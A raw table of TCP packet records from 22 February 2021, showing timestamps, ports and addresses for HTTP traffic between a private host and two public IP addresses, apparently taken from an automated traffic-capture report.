Feb 22, 2021 09:14:56.442078114 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.442085028 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442104101 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.442121029 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442826033 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442854881 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442882061 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.442903996 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442905903 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.442928076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442950964 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.442970991 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.442989111 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.443037033 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.443715096 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.443741083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.443763971 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.443795919 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.443820000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.443824053 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.443841934 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.443841934 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.444672108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.444696903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.444717884 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.444735050 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.444773912 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.465862989 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.465905905 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.465934992 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.465965033 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.465970039 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.465993881 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.465996981 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.466025114 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466037035 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.466212034 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466242075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466270924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466299057 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.466300011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466320038 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.466327906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466357946 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.466397047 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.467111111 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.467139959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.467166901 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.467195034 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.467197895 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.467221022 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.467221975 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.467248917 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.467288971 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.468049049 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468091965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468108892 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.468128920 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468163967 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468200922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468209982 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.468235970 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468240023 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.468904018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468945980 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.468981981 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469005108 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.469017029 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469027996 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.469059944 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469100952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469146967 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.469782114 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469820023 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469856024 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469856024 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.469891071 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469894886 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.469924927 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.469959021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.470002890 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.470685005 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.470721960 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.470756054 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.470757008 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.470798969 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.486876965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.486921072 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.486947060 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.486973047 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.486990929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.486989975 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.487013102 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487031937 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.487051010 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.487184048 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487214088 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487240076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487262011 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.487262964 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487287998 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487312078 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.487315893 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.487355947 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.488117933 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.488149881 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.488176107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.488198996 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.488203049 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.488221884 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.488245010 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.488246918 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.488291025 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.489077091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489151001 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489201069 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.489208937 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489244938 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489283085 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.489291906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489330053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489370108 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.489890099 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489933968 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489968061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.489984035 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.490026951 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490072966 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.490133047 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490159035 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490207911 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.490813971 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490839005 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490861893 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490895987 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490920067 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.490922928 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490951061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.490958929 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.491005898 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.491691113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.491727114 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.491758108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.491777897 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.491786003 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.491813898 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.491837025 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.491839886 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.491885900 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.510190010 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510219097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510235071 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510251045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510268927 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510288000 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.510293007 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510356903 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.510376930 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.510580063 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510601044 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510617018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510637999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510658026 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510668993 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.510678053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.510739088 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.510756016 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.511430979 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.511475086 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.511497021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.511518002 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.511538029 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.511538029 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.511550903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.511578083 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.511609077 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.512557030 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.512583017 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.512600899 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.512618065 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.512634993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.512655973 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.512675047 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.512717962 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.513206959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.513227940 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.513247967 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.513266087 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.513278961 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.513289928 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.513308048 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.513345957 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.513405085 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.514168024 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.514194965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.514219999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.514245033 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.514269114 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.514281034 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.514291048 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.514331102 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.514367104 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.515011072 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515036106 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515054941 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515073061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515089989 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515108109 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515151978 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.515206099 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.515937090 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515960932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.515981913 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.516000986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.516016960 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.516062975 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.516077042 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.533734083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.533763885 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.533782959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.533807039 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.533828974 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.533828974 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.533847094 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.533858061 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.533885956 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.534061909 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.534084082 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.534101963 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.534120083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.534136057 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.534142017 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.534161091 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.534168005 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.534181118 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.535420895 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535445929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535464048 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535480976 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535501003 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535511017 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.535518885 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535530090 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.535561085 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.535801888 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535825968 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535845995 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535862923 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535881042 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535890102 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.535898924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.535919905 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.536724091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.536741972 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.536761999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.536777973 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.536799908 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.536808014 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.536822081 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.536822081 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.536847115 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.537617922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.537636995 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.537673950 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.537698984 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.537719965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.537744045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.537770033 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.537836075 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.538502932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.538522959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.538542986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.538566113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.538585901 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.538589001 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.538611889 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.538638115 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.539406061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.539428949 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.539450884 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.539468050 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.539486885 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.539486885 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.539506912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.539540052 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.540316105 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.540357113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.540381908 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.540395975 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.540515900 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.566021919 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.566054106 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.566073895 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.566087008 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.566109896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.566128969 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.566215038 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:56.878987074 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:56.933768034 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.255891085 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.256057024 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.601452112 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.648781061 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723264933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723345041 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723402977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723459005 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723480940 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.723512888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723581076 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.723581076 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723643064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723666906 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.723701954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723757029 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723778009 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.723809958 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723861933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723927021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.723944902 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.723985910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.724036932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.724042892 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.724088907 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.724133968 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.724138975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.724195004 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.724224091 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.752782106 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.752845049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.752904892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.752929926 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.752973080 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.752976894 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753015995 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753052950 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753066063 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753093004 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753130913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753135920 CET	49761	80	192.168.2.4	172.67.172.17
